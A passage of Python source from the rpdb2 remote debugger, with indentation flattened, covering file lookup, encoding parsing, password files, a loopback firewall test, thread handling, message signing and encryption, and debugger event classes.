abspath = my_abspath(filename)
lowered = winlower(abspath)
scriptname = CalcScriptName(lowered, fAllowAnyExt)
if myisfile(scriptname):
return scriptname
#
# Check .pyw files
#
scriptname += 'w'
if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
return scriptname
scriptname = None
raise IOError
finally:
if not is_py3k() and is_unicode(scriptname):
fse = sys.getfilesystemencoding()
_l = as_string(scriptname, fse)
if '?' in _l:
g_found_unicode_files[_l] = scriptname
return _l
scriptname = CalcScriptName(filename, fAllowAnyExt)
try:
cwd = [getcwd(), getcwdu()]
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
cwd = [getcwdu()]
env_path = os.environ['PATH']
paths = sources_paths + cwd + g_initial_cwd + sys.path + env_path.split(os.pathsep)
try:
lowered = None
for p in paths:
f = my_os_path_join(p, scriptname)
abspath = my_abspath(f)
lowered = winlower(abspath)
if myisfile(lowered):
return lowered
#
# Check .pyw files
#
lowered += 'w'
if lowered.endswith(PYTHONW_FILE_EXTENSION) and myisfile(lowered):
return lowered
lowered = None
raise IOError
finally:
if not is_py3k() and is_unicode(lowered):
fse = sys.getfilesystemencoding()
_l = as_string(lowered, fse)
if '?' in _l:
g_found_unicode_files[_l] = lowered
return _l
def IsFileInPath(filename):
if filename == '':
return False
try:
FindFile(filename)
return True
except IOError:
return False
def IsPrefixInEnviron(_str):
for e in os.environ.keys():
if e.startswith(_str):
return True
return False
def CalcTerminalCommand():
"""
Calc the unix command to start a new terminal, for example: xterm
"""
if RPDBTERM in os.environ:
term = os.environ[RPDBTERM]
if IsFileInPath(term):
return term
if COLORTERM in os.environ:
term = os.environ[COLORTERM]
if IsFileInPath(term):
return term
if IsPrefixInEnviron(KDE_PREFIX):
(s, term) = commands.getstatusoutput(KDE_DEFAULT_TERM_QUERY)
if (s == 0) and IsFileInPath(term):
return term
elif IsPrefixInEnviron(GNOME_PREFIX):
if IsFileInPath(GNOME_DEFAULT_TERM):
return GNOME_DEFAULT_TERM
if IsFileInPath(XTERM):
return XTERM
if IsFileInPath(RXVT):
return RXVT
raise SpawnUnsupported
def CalcMacTerminalCommand(command):
"""
Calculate what to put in popen to start a given script.
Starts a tiny Applescript that performs the script action.
"""
#
# Quoting is a bit tricky; we do it step by step.
# Make Applescript string: put backslashes before double quotes and
# backslashes.
#
command = command.replace('\\', '\\\\').replace('"', '\\"')
#
# Make complete Applescript command.
#
command = 'tell application "Terminal" to do script "%s"' % command
#
# Make a shell single quoted string (put backslashed single quotes
# outside string).
#
command = command.replace("'", "'\\''")
#
# Make complete shell command.
#
return "osascript -e '%s'" % command
def winlower(path):
"""
return lowercase version of 'path' on NT systems.
On NT filenames are case insensitive so lowercase filenames
for comparison purposes on NT.
"""
if os.name == 'nt':
return path.lower()
return path
def source_provider_blender(filename):
"""
Return source code of the file referred by filename.
Support for debugging of Blender Python scripts.
Blender scripts are not always saved on disk, and their
source has to be queried directly from the Blender API.
http://www.blender.org
"""
if not 'Blender.Text' in sys.modules:
raise IOError
if filename.startswith('<'):
#
# This specifies blender source whose source is not
# available.
#
raise IOError(BLENDER_SOURCE_NOT_AVAILABLE)
_filename = os.path.basename(filename)
try:
t = sys.modules['Blender.Text'].get(_filename)
lines = t.asLines()
return '\n'.join(lines) + '\n'
except NameError:
f = winlower(_filename)
tlist = sys.modules['Blender.Text'].get()
t = None
for _t in tlist:
n = winlower(_t.getName())
if n == f:
t = _t
break
if t == None:
#
# filename does not specify a blender file. Raise IOError
# so that search can continue on file system.
#
raise IOError
lines = t.asLines()
return '\n'.join(lines) + '\n'
def source_provider_filesystem(filename):
l = mygetfile(filename)
if l[:3] == as_bytes(ENCODING_UTF8_PREFIX_1):
l = l[3:]
return l
def source_provider(filename):
source = None
ffilesystem = False
try:
if g_source_provider_aux != None:
source = g_source_provider_aux(filename)
except IOError:
v = sys.exc_info()[1]
if SOURCE_NOT_AVAILABLE in v.args:
raise
try:
if source == None:
source = source_provider_blender(filename)
except IOError:
v = sys.exc_info()[1]
if BLENDER_SOURCE_NOT_AVAILABLE in v.args:
raise
if source == None:
source = source_provider_filesystem(filename)
ffilesystem = True
encoding = ParseEncoding(source)
if not is_unicode(source):
source = as_unicode(source, encoding)
return source, encoding, ffilesystem
def lines_cache(filename):
filename = g_found_unicode_files.get(filename, filename)
if filename in g_lines_cache:
return g_lines_cache[filename]
(source, encoding, ffilesystem) = source_provider(filename)
source = source.replace(as_unicode('\r\n'), as_unicode('\n'))
lines = source.split(as_unicode('\n'))
g_lines_cache[filename] = (lines, encoding, ffilesystem)
return (lines, encoding, ffilesystem)
def get_source(filename):
(lines, encoding, ffilesystem) = lines_cache(filename)
source = as_unicode('\n').join(lines)
return (source, encoding)
def get_source_line(filename, lineno):
(lines, encoding, ffilesystem) = lines_cache(filename)
if lineno > len(lines):
return as_unicode('')
return lines[lineno - 1] + as_unicode('\n')
def is_provider_filesystem(filename):
try:
(lines, encoding, ffilesystem) = lines_cache(filename)
return ffilesystem
except IOError:
v = sys.exc_info()[1]
return not (BLENDER_SOURCE_NOT_AVAILABLE in v.args or SOURCE_NOT_AVAILABLE in v.args)
def get_file_encoding(filename):
(lines, encoding, ffilesystem) = lines_cache(filename)
return encoding
def ParseLineEncoding(l):
if l.startswith('# -*- coding: '):
e = l[len('# -*- coding: '):].split()[0]
return e
if l.startswith('# vim:fileencoding='):
e = l[len('# vim:fileencoding='):].strip()
return e
return None
def ParseEncoding(txt):
"""
Parse document encoding according to:
http://docs.python.org/ref/encodings.html
"""
eol = '\n'
if not is_unicode(txt):
eol = as_bytes('\n')
l = txt.split(eol, 20)[:-1]
for line in l:
line = as_unicode(line)
encoding = ParseLineEncoding(line)
if encoding is not None:
try:
codecs.lookup(encoding)
return encoding
except:
return 'utf-8'
return 'utf-8'
def _getpid():
try:
return os.getpid()
except:
return -1
def calcURL(host, port):
"""
Form HTTP URL from 'host' and 'port' arguments.
"""
url = "http://" + str(host) + ":" + str(port)
return url
def GetSocketError(e):
if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
return -1
return e.args[0]
def ControlRate(t_last_call, max_rate):
"""
Limits rate at which this function is called by sleeping.
Returns the time of invocation.
"""
p = 1.0 / max_rate
t_current = time.time()
dt = t_current - t_last_call
if dt < p:
time.sleep(p - dt)
return t_current
def generate_rid():
"""
Return a 7 digits random id.
"""
rid = repr(random.randint(1000000, 9999999))
rid = as_unicode(rid)
return rid
def generate_random_char(_str):
"""
Return a random character from string argument.
"""
if _str == '':
return ''
i = random.randint(0, len(_str) - 1)
return _str[i]
def generate_random_password():
"""
Generate an 8 characters long password.
"""
s = 'abdefghijmnqrt' + 'ABDEFGHJLMNQRTY'
ds = '23456789_' + s
_rpdb2_pwd = generate_random_char(s)
for i in range(0, 7):
_rpdb2_pwd += generate_random_char(ds)
_rpdb2_pwd = as_unicode(_rpdb2_pwd)
return _rpdb2_pwd
def is_valid_pwd(_rpdb2_pwd):
if _rpdb2_pwd in [None, '']:
return False
try:
if not is_unicode(_rpdb2_pwd):
_rpdb2_pwd = _rpdb2_pwd.decode('ascii')
_rpdb2_pwd.encode('ascii')
except:
return False
for c in _rpdb2_pwd:
if c.isalnum():
continue
if c == '_':
continue
return False
return True
def is_encryption_supported():
"""
Is the Crypto module imported/available.
"""
return 'DES' in globals()
def calc_suffix(_str, n):
"""
Return an n charaters suffix of the argument string of the form
'...suffix'.
"""
if len(_str) <= n:
return _str
return '...' + _str[-(n - 3):]
def calc_prefix(_str, n):
"""
Return an n charaters prefix of the argument string of the form
'prefix...'.
"""
if len(_str) <= n:
return _str
return _str[: (n - 3)] + '...'
def create_rpdb_settings_folder():
"""
Create the settings folder on Posix systems:
'~/.rpdb2_settings' with mode 700.
"""
if os.name != POSIX:
return
home = os.path.expanduser('~')
rsf = os.path.join(home, RPDB_SETTINGS_FOLDER)
if not os.path.exists(rsf):
os.mkdir(rsf, int('0700', 8))
pwds = os.path.join(home, RPDB_PWD_FOLDER)
if not os.path.exists(pwds):
os.mkdir(pwds, int('0700', 8))
bpl = os.path.join(home, RPDB_BPL_FOLDER)
if not os.path.exists(bpl):
os.mkdir(bpl, int('0700', 8))
def cleanup_bpl_folder(path):
if random.randint(0, 10) > 0:
return
l = os.listdir(path)
if len(l) < MAX_BPL_FILES:
return
try:
ll = [(os.stat(os.path.join(path, f))[stat.ST_ATIME], f) for f in l]
except:
return
ll.sort()
for (t, f) in ll[: -MAX_BPL_FILES]:
try:
os.remove(os.path.join(path, f))
except:
pass
def calc_bpl_filename(filename):
key = as_bytes(filename)
tmp_filename = hmac.new(key).hexdigest()[:10]
if os.name == POSIX:
home = os.path.expanduser('~')
bpldir = os.path.join(home, RPDB_BPL_FOLDER)
cleanup_bpl_folder(bpldir)
path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
return path
#
# gettempdir() is used since it works with unicode user names on
# Windows.
#
tmpdir = tempfile.gettempdir()
bpldir = os.path.join(tmpdir, RPDB_BPL_FOLDER_NT)
if not os.path.exists(bpldir):
#
# Folder creation is done here since this is a temp folder.
#
try:
os.mkdir(bpldir, int('0700', 8))
except:
print_debug_exception()
raise CException
else:
cleanup_bpl_folder(bpldir)
path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
return path
def calc_pwd_file_path(rid):
"""
Calc password file path for Posix systems:
'~/.rpdb2_settings/<rid>'
"""
home = os.path.expanduser('~')
rsf = os.path.join(home, RPDB_PWD_FOLDER)
pwd_file_path = os.path.join(rsf, rid)
return pwd_file_path
def create_pwd_file(rid, _rpdb2_pwd):
"""
Create password file for Posix systems.
"""
if os.name != POSIX:
return
path = calc_pwd_file_path(rid)
fd = os.open(path, os.O_WRONLY | os.O_CREAT, int('0600', 8))
os.write(fd, as_bytes(_rpdb2_pwd))
os.close(fd)
def read_pwd_file(rid):
"""
Read password from password file for Posix systems.
"""
assert(os.name == POSIX)
path = calc_pwd_file_path(rid)
p = open(path, 'r')
_rpdb2_pwd = p.read()
p.close()
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
return _rpdb2_pwd
def delete_pwd_file(rid):
"""
Delete password file for Posix systems.
"""
if os.name != POSIX:
return
path = calc_pwd_file_path(rid)
try:
os.remove(path)
except:
pass
def CalcUserShell():
try:
s = os.getenv('SHELL')
if s != None:
return s
import getpass
username = getpass.getuser()
f = open('/etc/passwd', 'r')
l = f.read()
f.close()
ll = l.split('\n')
d = dict([(e.split(':', 1)[0], e.split(':')[-1]) for e in ll])
return d[username]
except:
return 'sh'
def IsFilteredAttribute(a):
if not (a.startswith('__') and a.endswith('__')):
return False
if a in ['__class__', '__bases__', '__file__', '__doc__', '__name__', '__all__', '__builtins__']:
return False
return True
def IsFilteredAttribute2(r, a):
try:
o = getattr(r, a)
r = parse_type(type(o))
if 'function' in r or 'method' in r or r == 'type':
return True
return False
except:
return False
def CalcFilteredDir(r, filter_level):
d = dir(r)
if 'finfo' in d and parse_type(type(r)) == 'mp_request':
#
# Workaround mod_python segfault in type(req.finfo) by
# removing this attribute from the namespace viewer.
#
d.remove('finfo')
if filter_level == 0:
return d
fd = [a for a in d if not IsFilteredAttribute(a)]
return fd
def CalcIdentity(r, filter_level):
if filter_level == 0:
return r
if not hasattr(r, 'im_func'):
return r
return r.im_func
def getattr_nothrow(o, a):
try:
return getattr(o, a)
except AttributeError:
return ERROR_NO_ATTRIBUTE
except:
print_debug_exception()
return ERROR_NO_ATTRIBUTE
def calc_attribute_list(r, filter_level):
d = CalcFilteredDir(r, filter_level)
rs = set(d)
c = getattr_nothrow(r, '__class__')
if not c is ERROR_NO_ATTRIBUTE:
d = CalcFilteredDir(c, False)
cs = set(d)
s = rs & cs
for e in s:
o1 = getattr_nothrow(r, e)
o2 = getattr_nothrow(c, e)
if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
rs.discard(e)
try:
if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
rs.discard(e)
except:
pass
bl = getattr_nothrow(r, '__bases__')
if type(bl) == tuple:
for b in bl:
d = CalcFilteredDir(b, False)
bs = set(d)
s = rs & bs
for e in s:
o1 = getattr_nothrow(r, e)
o2 = getattr_nothrow(b, e)
if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
rs.discard(e)
try:
if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
rs.discard(e)
except:
pass
l = [a for a in rs if (filter_level < 2 or not IsFilteredAttribute2(r, a))]
if hasattr(r, '__class__') and not '__class__' in l:
l = ['__class__'] + l
if hasattr(r, '__bases__') and not '__bases__' in l:
l = ['__bases__'] + l
al = [a for a in l if hasattr(r, a)]
return al
class _RPDB2_FindRepr:
def __init__(self, o, repr_limit):
self.m_object = o
self.m_repr_limit = repr_limit
def __getitem__(self, key):
index = 0
for i in self.m_object:
if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
if isinstance(self.m_object, dict):
return self.m_object[i]
return i
index += 1
if index > MAX_SORTABLE_LENGTH:
return None
def __setitem__(self, key, value):
if not isinstance(self.m_object, dict):
return
index = 0
for i in self.m_object:
if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
self.m_object[i] = value
return
index += 1
if index > MAX_SORTABLE_LENGTH:
return
#
# Since on Python 3000 the comparison of different types raises exceptions and
# the __cmp__ method was removed, sorting of namespace items is based on
# lexicographic order except for numbers which are sorted normally and appear
# before all other types.
#
def sort(s):
if sys.version_info[:2] == (2, 3):
#
# On Python 2.3 the key parameter is not supported.
#
s.sort(sort_cmp)
return
s.sort(key = sort_key)
def sort_key(e):
if is_py3k() and isinstance(e, numbers.Number):
return (0, e)
if not is_py3k() and operator.isNumberType(e):
return (0, e)
return (1, repr_ltd(e, 256, encoding = ENCODING_RAW_I))
def sort_cmp(x, y):
skx = sort_key(x)
sky = sort_key(y)
return cmp(skx, sky)
def recalc_sys_path(old_pythonpath):
opl = old_pythonpath.split(os.path.pathsep)
del sys.path[1: 1 + len(opl)]
pythonpath = os.environ.get('PYTHONPATH', '')
ppl = pythonpath.split(os.path.pathsep)
for i, p in enumerate(ppl):
abspath = my_abspath(p)
lowered = winlower(abspath)
sys.path.insert(1 + i, lowered)
def calc_signame(signum):
for k, v in vars(signal).items():
if not k.startswith('SIG') or k in ['SIG_IGN', 'SIG_DFL', 'SIGRTMIN', 'SIGRTMAX']:
continue
if v == signum:
return k
return '?'
#
# Similar to traceback.extract_stack() but fixes path with calc_frame_path()
#
def my_extract_stack(f):
if f == None:
return []
try:
g_traceback_lock.acquire()
_s = traceback.extract_stack(f)
finally:
g_traceback_lock.release()
_s.reverse()
s = []
for (p, ln, fn, text) in _s:
path = as_unicode(calc_frame_path(f), sys.getfilesystemencoding())
if text == None:
text = ''
s.append((path, ln, as_unicode(fn), as_unicode(text)))
f = f.f_back
if f == None:
break
s.reverse()
return s
#
# Similar to traceback.extract_tb() but fixes path with calc_frame_path()
#
def my_extract_tb(tb):
try:
g_traceback_lock.acquire()
_s = traceback.extract_tb(tb)
finally:
g_traceback_lock.release()
s = []
for (p, ln, fn, text) in _s:
path = as_unicode(calc_frame_path(tb.tb_frame), sys.getfilesystemencoding())
if text == None:
text = ''
s.append((path, ln, as_unicode(fn), as_unicode(text)))
tb = tb.tb_next
if tb == None:
break
return s
def get_traceback(frame, ctx):
if is_py3k():
if ctx.get_exc_info() != None:
return ctx.get_exc_info()[2]
else:
if frame.f_exc_traceback != None:
return frame.f_exc_traceback
locals = copy.copy(frame.f_locals)
if not 'traceback' in locals:
return None
tb = locals['traceback']
if dir(tb) == ['tb_frame', 'tb_lasti', 'tb_lineno', 'tb_next']:
return tb
class CFirewallTest:
m_port = None
m_thread_server = None
m_thread_client = None
m_lock = threading.RLock()
def __init__(self, fremote = False, timeout = 4):
if fremote:
self.m_loopback = ''
else:
self.m_loopback = LOOPBACK
self.m_timeout = timeout
self.m_result = None
self.m_last_server_error = None
self.m_last_client_error = None
def run(self):
CFirewallTest.m_lock.acquire()
try:
#
# If either the server or client are alive after a timeout
# it means they are blocked by a firewall. Return False.
#
server = CFirewallTest.m_thread_server
if server != None and thread_is_alive(server):
server.join(self.m_timeout * 1.5)
if thread_is_alive(server):
return False
client = CFirewallTest.m_thread_client
if client != None and thread_is_alive(client):
client.join(self.m_timeout * 1.5)
if thread_is_alive(client):
return False
CFirewallTest.m_port = None
self.m_result = None
t0 = time.time()
server = threading.Thread(target = self.__server)
server.start()
CFirewallTest.m_thread_server = server
#
# If server exited or failed to setup after a timeout
# it means it was blocked by a firewall.
#
while CFirewallTest.m_port == None and thread_is_alive(server):
if time.time() - t0 > self.m_timeout * 1.5:
return False
time.sleep(0.1)
if not thread_is_alive(server):
return False
t0 = time.time()
client = threading.Thread(target = self.__client)
client.start()
CFirewallTest.m_thread_client = client
while self.m_result == None and thread_is_alive(client):
if time.time() - t0 > self.m_timeout * 1.5:
return False
time.sleep(0.1)
return self.m_result
finally:
CFirewallTest.m_lock.release()
def __client(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.m_timeout)
try:
try:
s.connect((LOOPBACK, CFirewallTest.m_port))
s.send(as_bytes('Hello, world'))
data = self.__recv(s, 1024)
self.m_result = True
except socket.error:
e = sys.exc_info()[1]
self.m_last_client_error = e
self.m_result = False
finally:
s.close()
def __server(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.m_timeout)
if os.name == POSIX:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = SERVER_PORT_RANGE_START
while True:
try:
s.bind((self.m_loopback, port))
break
except socket.error:
e = sys.exc_info()[1]
if self.__GetSocketError(e) != errno.EADDRINUSE:
self.m_last_server_error = e
s.close()
return
if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
self.m_last_server_error = e
s.close()
return
port += 1
CFirewallTest.m_port = port
try:
try:
conn = None
s.listen(1)
conn, addr = s.accept()
while True:
data = self.__recv(conn, 1024)
if not data:
return
conn.send(data)
except socket.error:
e = sys.exc_info()[1]
self.m_last_server_error = e
finally:
if conn != None:
conn.close()
s.close()
def __recv(self, s, len):
t0 = time.time()
while True:
try:
data = s.recv(1024)
return data
except socket.error:
e = sys.exc_info()[1]
if self.__GetSocketError(e) != errno.EWOULDBLOCK:
print_debug('socket error was caught, %s' % repr(e))
raise
if time.time() - t0 > self.m_timeout:
raise
continue
def __GetSocketError(self, e):
if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
return -1
return e.args[0]
#
# ---------------------------------- CThread ---------------------------------------
#
class CThread (threading.Thread):
m_fstop = False
m_threads = {}
m_lock = threading.RLock()
m_id = 0
def __init__(self, name = None, target = None, args = (), shutdown = None):
threading.Thread.__init__(self, name = name, target = target, args = args)
self.m_fstarted = False
self.m_shutdown_callback = shutdown
self.m_id = self.__getId()
def __del__(self):
#print_debug('Destructor called for ' + thread_get_name(self))
#threading.Thread.__del__(self)
if self.m_fstarted:
try:
del CThread.m_threads[self.m_id]
except KeyError:
pass
def start(self):
if CThread.m_fstop:
return
CThread.m_threads[self.m_id] = weakref.ref(self)
if CThread.m_fstop:
del CThread.m_threads[self.m_id]
return
self.m_fstarted = True
threading.Thread.start(self)
def run(self):
sys.settrace(None)
sys.setprofile(None)
threading.Thread.run(self)
def join(self, timeout = None):
try:
threading.Thread.join(self, timeout)
except AssertionError:
pass
def shutdown(self):
if self.m_shutdown_callback:
self.m_shutdown_callback()
def joinAll(cls):
print_debug('Shutting down debugger threads...')
CThread.m_fstop = True
for tid, w in list(CThread.m_threads.items()):
t = w()
if not t:
continue
try:
#print_debug('Calling shutdown of thread %s.' % thread_get_name(t))
t.shutdown()
except:
pass
t = None
t0 = time.time()
while len(CThread.m_threads) > 0:
if time.time() - t0 > SHUTDOWN_TIMEOUT:
print_debug('Shut down of debugger threads has TIMED OUT!')
return
#print_debug(repr(CThread.m_threads))
time.sleep(0.1)
print_debug('Shut down debugger threads, done.')
joinAll = classmethod(joinAll)
def clearJoin(cls):
CThread.m_fstop = False
clearJoin = classmethod(clearJoin)
def __getId(self):
CThread.m_lock.acquire()
id = CThread.m_id
CThread.m_id += 1
CThread.m_lock.release()
return id
#
#--------------------------------------- Crypto ---------------------------------------
#
class CCrypto:
"""
Handle authentication and encryption of data, using password protection.
"""
m_keys = {}
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, rid):
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
self.m_rpdb2_pwd = _rpdb2_pwd
self.m_key = self.__calc_key(_rpdb2_pwd)
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_rid = rid
self.m_failure_lock = threading.RLock()
self.m_lock = threading.RLock()
self.m_index_anchor_in = random.randint(0, 1000000000)
self.m_index_anchor_ex = 0
self.m_index = 0
self.m_index_table = {}
self.m_index_table_size = INDEX_TABLE_SIZE
self.m_max_index = 0
def __calc_key(self, _rpdb2_pwd):
"""
Create and return a key from a password.
A Weak password means a weak key.
"""
if _rpdb2_pwd in CCrypto.m_keys:
return CCrypto.m_keys[_rpdb2_pwd]
key = as_bytes(_rpdb2_pwd)
suffix = key[:16]
d = hmac.new(key, digestmod = _md5)
#
# The following loop takes around a second to complete
# and should strengthen the password by ~12 bits.
# a good password is ~30 bits strong so we are looking
# at ~42 bits strong key
#
for i in range(2 ** 12):
d.update((key + suffix) * 16)
key = d.digest()
CCrypto.m_keys[_rpdb2_pwd] = key
return key
def set_index(self, i, anchor):
try:
self.m_lock.acquire()
self.m_index = i
self.m_index_anchor_ex = anchor
finally:
self.m_lock.release()
def get_max_index(self):
return self.m_max_index
def do_crypto(self, args, fencrypt):
"""
Sign args and possibly encrypt.
Return signed/encrypted string.
"""
if not fencrypt and not self.m_fAllowUnencrypted:
raise EncryptionExpected
if fencrypt and not is_encryption_supported():
raise EncryptionNotSupported
(digest, s) = self.__sign(args)
fcompress = False
if len(s) > 50000:
_s = zlib.compress(s)
if len(_s) < len(s) * 0.4:
s = _s
fcompress = True
if fencrypt:
s = self.__encrypt(s)
s = base64.encodestring(s)
u = as_unicode(s)
return (fcompress, digest, u)
def undo_crypto(self, fencrypt, fcompress, digest, msg, fVerifyIndex = True):
"""
Take crypto string, verify its signature and decrypt it, if
needed.
"""
if not fencrypt and not self.m_fAllowUnencrypted:
raise EncryptionExpected
if fencrypt and not is_encryption_supported():
raise EncryptionNotSupported
s = as_bytes(msg)
s = base64.decodestring(s)
if fencrypt:
s = self.__decrypt(s)
if fcompress:
s = zlib.decompress(s)
args, id = self.__verify_signature(digest, s, fVerifyIndex)
return (args, id)
def __encrypt(self, s):
s_padded = s + as_bytes('\x00') * (DES.block_size - (len(s) % DES.block_size))
key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
iv = '0' * DES.block_size
d = DES.new(key_padded, DES.MODE_CBC, iv)
r = d.encrypt(s_padded)
return r
def __decrypt(self, s):
try:
key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
iv = '0' * DES.block_size
d = DES.new(key_padded, DES.MODE_CBC, iv)
_s = d.decrypt(s).strip(as_bytes('\x00'))
return _s
except:
self.__wait_a_little()
raise DecryptionFailure
def __sign(self, args):
i = self.__get_next_index()
pack = (self.m_index_anchor_ex, i, self.m_rid, args)
#print_debug('***** 1' + repr(args)[:50])
s = pickle.dumps(pack, 2)
#print_debug('***** 2' + repr(args)[:50])
h = hmac.new(self.m_key, s, digestmod = _md5)
d = h.hexdigest()
#if 'coding:' in s:
# print_debug('%s, %s, %s\n\n==========\n\n%s' % (len(s), d, repr(args), repr(s)))
return (d, s)
def __get_next_index(self):
try:
self.m_lock.acquire()
self.m_index += 1
return self.m_index
finally:
self.m_lock.release()
def __verify_signature(self, digest, s, fVerifyIndex):
try:
h = hmac.new(self.m_key, s, digestmod = _md5)
d = h.hexdigest()
#if 'coding:' in s:
# print_debug('%s, %s, %s, %s' % (len(s), digest, d, repr(s)))
if d != digest:
self.__wait_a_little()
raise AuthenticationFailure
pack = pickle.loads(s)
(anchor, i, id, args) = pack
except AuthenticationFailure:
raise
except:
print_debug_exception()
self.__wait_a_little()
raise AuthenticationBadData
if fVerifyIndex:
self.__verify_index(anchor, i, id)
return args, id
def __verify_index(self, anchor, i, id):
"""
Manage messages ids to prevent replay of old messages.
"""
try:
try:
self.m_lock.acquire()
if anchor != self.m_index_anchor_in:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
if i > self.m_max_index + INDEX_TABLE_SIZE // 2:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
i_mod = i % INDEX_TABLE_SIZE
(iv, idl) = self.m_index_table.get(i_mod, (None, None))
#print >> sys.__stderr__, i, i_mod, iv, self.m_max_index
if (iv is None) or (i > iv):
idl = [id]
elif (iv == i) and (not id in idl):
idl.append(id)
else:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
self.m_index_table[i_mod] = (i, idl)
if i > self.m_max_index:
self.m_max_index = i
return self.m_index
finally:
self.m_lock.release()
except:
self.__wait_a_little()
raise
def __wait_a_little(self):
self.m_failure_lock.acquire()
time.sleep((1.0 + random.random()) / 2)
self.m_failure_lock.release()
#
# --------------------------------- Events List --------------------------
#
class CEvent(object):
"""
Base class for events.
"""
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def is_match(self, arg):
pass
class CEventNull(CEvent):
"""
Sent to release event listeners (Internal, speeds up shutdown).
"""
pass
class CEventEmbeddedSync(CEvent):
"""
Sent when an embedded interpreter becomes active if it needs to
determine if there are pending break requests. (Internal)
"""
pass
class CEventClearSourceCache(CEvent):
"""
Sent when the source cache is cleared.
"""
pass
class CEventSignalIntercepted(CEvent):
"""
This event is sent when a signal is intercepted inside tracing code.
Such signals are held pending until tracing code is returned from.
"""
def __init__(self, signum):
self.m_signum = signum
self.m_signame = calc_signame(signum)
class CEventSignalException(CEvent):
"""
This event is sent when the handler of a previously intercepted signal
raises an exception. Such exceptions are ignored because of technical
limitations.
"""
def __init__(self, signum, description):
self.m_signum = signum
self.m_signame = calc_signame(signum)
self.m_description = description
class CEventEncoding(CEvent):
"""
The encoding has been set.
"""
def __init__(self, encoding, fraw):
self.m_encoding = encoding
self.m_fraw = fraw
class CEventPsycoWarning(CEvent):
"""
The psyco module was detected. rpdb2 is incompatible with this module.
"""
pass
class CEventConflictingModules(CEvent):
"""
Conflicting modules were detected. rpdb2 is incompatible with these modules.
"""
def __init__(self, modules_list):
self.m_modules_list = modules_list
class CEventSyncReceivers(CEvent):
"""
A base class for events that need to be received by all listeners at
the same time. The synchronization mechanism is internal to rpdb2.
"""
def __init__(self, sync_n):
self.m_sync_n = sync_n
class CEventForkSwitch(CEventSyncReceivers):
"""
Debuggee is about to fork. Try to reconnect.
"""
pass
class CEventExecSwitch(CEventSyncReceivers):
"""
Debuggee is about to exec. Try to reconnect.
"""
pass
class CEventExit(CEvent):
"""
Debuggee is terminating.
"""
pass
class CEventState(CEvent):
"""
State of the debugger.
Value of m_state can be one of the STATE_* globals.
"""
def __init__(self, state):
self.m_state = as_unicode(state)
def is_match(self, arg):
return self.m_state == as_unicode(arg)
class CEventSynchronicity(CEvent):
"""
Mode of synchronicity.
Sent when mode changes.
"""
def __init__(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
def is_match(self, arg):
return self.m_fsynchronicity == arg
class CEventTrap(CEvent):
"""
Mode of "trap unhandled exceptions".
Sent when the mode changes.
"""
def __init__(self, ftrap):
self.m_ftrap = ftrap
def is_match(self, arg):
return self.m_ftrap == arg
class CEventForkMode(CEvent):
"""
Mode of fork behavior has changed.
Sent when the mode changes.
"""
def __init__(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
class CEventUnhandledException(CEvent):
"""
Unhandled Exception
Sent when an unhandled exception is caught.
"""
class CEventNamespace(CEvent):
"""
Namespace has changed.
This tells the debugger it should query the namespace again.
"""
pass
class CEventNoThreads(CEvent):
"""
No threads to debug.
Debuggee notifies the debugger that it has no threads. This can
happen in embedded debugging and in a python interpreter session.
"""
pass
class CEventThreads(CEvent):
"""
State of threads.
"""
def __init__(self, _current_thread, thread_list):
self.m_current_thread = _current_thread
self.m_thread_list = thread_list
class CEventThreadBroken(CEvent):
"""
A thread has broken.
"""
def __init__(self, tid, name):
self.m_tid = tid
self.m_name = as_unicode(name)
class CEventStack(CEvent):
"""
Stack of current thread.
"""
def __init__(self, stack):
self.m_stack = stack
class CEventStackFrameChange(CEvent):
"""
Stack frame has changed.
This event is sent when the debugger goes up or down the stack.
"""
def __init__(self, frame_index):
self.m_frame_index = frame_index
class CEventStackDepth(CEvent):
"""
Stack depth has changed.
"""
def __init__(self, stack_depth, stack_depth_exception):
self.m_stack_depth = stack_depth
self.m_stack_depth_exception = stack_depth_exception
class CEventBreakpoint(CEvent):
"""
A breakpoint or breakpoints changed.
"""
DISABLE = as_unicode('disable')
ENABLE = as_unicode('enable')
REMOVE = as_unicode('remove')
SET = as_unicode('set')
def __init__(self, bp, action = SET, id_list = [], fAll = False):
self.m_bp = breakpoint_copy(bp)
self.m_action = action
self.m_id_list = id_list
self.m_fAll = fAll
class CEventSync(CEvent):
"""
Internal (not sent to the debugger) event that trigers the
firing of other events that help the debugger synchronize with
the state of the debuggee.
"""
def __init__(self, fException, fSendUnhandled):
self.m_fException = fException
self.m_fSendUnhandled = fSendUnhandled
#
